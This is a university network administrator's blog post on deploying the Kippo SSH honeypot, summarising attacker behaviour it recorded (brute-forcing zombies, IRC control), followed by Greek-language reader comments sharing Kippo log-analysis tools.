Kippo – SSH Honeypot

As part of the network administration in the Network Operation Center (NOC) of the Computer Center Laboratory, we must secure the server & network infrastructure from internal or external malicious activities. Crucial base server & network nodes have been independently secured against the majority of the attacks. But the challenge  is to be able to secure the non-crucial hosts, such as the user’s machines with access to servers and network devices from lower levels of the infrastructure. The obstacle to the whole concept is that we are on an university network, which include people with different levels of computer & IT knowledge, plus the big number of services and experimental technologies that are taking place. So we must implement security countermeasures that are unseen to the end users or simple enough to be adopted by any user into the university infrastructure.

On the of the security forensics approach is: “Allow attacks in a sandbox environment, analyze them and learn from them!“. Following this approach, we have come across with the honeypot mechanisms. Honeypots are mechanisms implemented in the networks that are designed to lure malicious activities in order to analyze them. They have low and easy to bypass security & access, forming a great trap for botnets and inexperienced hackers. The experience level that the attacker should have in order to get trapped in a honeypot host or network, depends on the honeypot’s interaction level and its implemented services. That’s why the honeypots are classified into low and high interaction. With low interaction offering emulated services (limited interaction) and high interaction offering full functionalities.

We have chosen a solution somewhere in the middle of the interaction scale. We were looking for something easy to setup due to our demands and easy to analyze its collection data for analysis. So we choose the Kippo, which is a medium interaction SSH honeypot. Kippo logs ssh bruteforce attacks and offers shell interaction to analyze the executed commands of the attacker. Its features include fake debian 5 based shell, fake filesystem that can be easily altered by the user, saving the wget downloaded files for analysis and UML compatible log files.

On part of our goal has been achieved by analyzing the malicious files that attackers have downloaded from infected web servers. We will continue running Kippo for a short period because we have discovered that moderators of large botnets retain a blacklist where they record IPs of hosts that aren’t real machines (such as honeypots). We come into great surprise when we realize that all the attacks we have recorded so far, were executed by a human and not any botnet script. And the goal of all the attackers was to turn the machine into a scanning zombie that launches bruteforcing attacks over the network. Additionally, most of the attackers tried to run an IRC server in order to mass control their infected hosts. We have recorded their IRC channels and the using code and we will keep an eye on their tactics.

In the near future we plan to establish a higher interaction level honeypot and honeynet, in order to analyze more advanced attacking techniques.

 

Here are some tty sessions of attacking tries that we have recorded from our honeypot, plus a python script that can be used to show the shell interaction from the attack:

Download Logs + PlayScript

 

Additionally with my affiliate John Kalantzis from the UNIX Administration Team we have conducted a presentation in PLUG about SSH Security and the use of Kippo honeypot. The slides from the presentation can be downloaded from here:

Presentation (.pdf 84 kb)

 

The Kippo honeypot project run with the collaboration of John Kalantzis.

 

 

A. Bechtsoudis

6 Comments

[...] For my experiments i use a password file containing 14.344.578 passwords gathered from the web and Kippo Honeypot. If you don’t have a Cuda or OCL compatible card, you can a CPU processing tool such as [...]

IonNovember 24th, 2011 at 02:25

Ανέστη καλησπέρα, ενδιαφέρομαι για το θέμα των honeypots και έχω στήσει δοκιμαστικά την τελευταία έκδοση του Kippo. Έχεις κρατήσει ή έχεις γράψει κάποια scripts για log file analysis/stats που μπορείς να διαθέσεις; Συνέχισε τα ενδιαφέροντα posts :)

anestisbNovember 24th, 2011 at 02:47

Hallo ION. Για την συλλογή διάφορων χρήσιμων stats από τα logs χρησιμοποιώ κάποιες παραλλαγές του kippo-stats. Επίσης κάποιοι χρήσιμοι one liners που μπορεί να σου χρειάστούν υπάρχουν εδώ.

IonNovember 24th, 2011 at 02:56

Σε ευχαριστώ. Ένα επιπλέον script υπάρχει εδώ: http://blog.infosanity.co.uk/2011/05/23/reviewing-kippo-logs/ το οποίο χρησιμοποιώ σε cron job. Ρίξε μια ματιά.

IonJanuary 3rd, 2012 at 06:12

Καλησπέρα και πάλι. Τελικά το πήρα λίγο σοβαρά το θέμα και έφτιαξα και 2 δικά μου εργαλεία, μπορείς να τα δεις εδώ: http://bruteforce.gr/kippo-graph και http://bruteforce.gr/kippo2mysql
Θα χαρώ να μου δώσεις feedback σε περίπτωση που τα χρησιμοποιήσεις. Μπορείς να επικοινωνήσεις μαζί μου είτε μέσω των σελίδων του κάθε προγράμματος (προτείνεται αν είναι σχετικό με αυτά) είτε στο email που βάζω εδώ για οτιδήποτε :)

Επίσης, εδώ: http://bruteforce.gr/the-big-post-of-kippo-scripts-front-ends-bash-one-liners-and-sql-queries.html έχω μαζέψει τα άπαντα του Kippo ας το πούμε έτσι. Όλα τα 3rd party tools κλπ.

anestisbJanuary 3rd, 2012 at 10:30

Πολύ καλή δουλειά. Με την πρώτη ευκαιριά θα τα δοκιμάσω.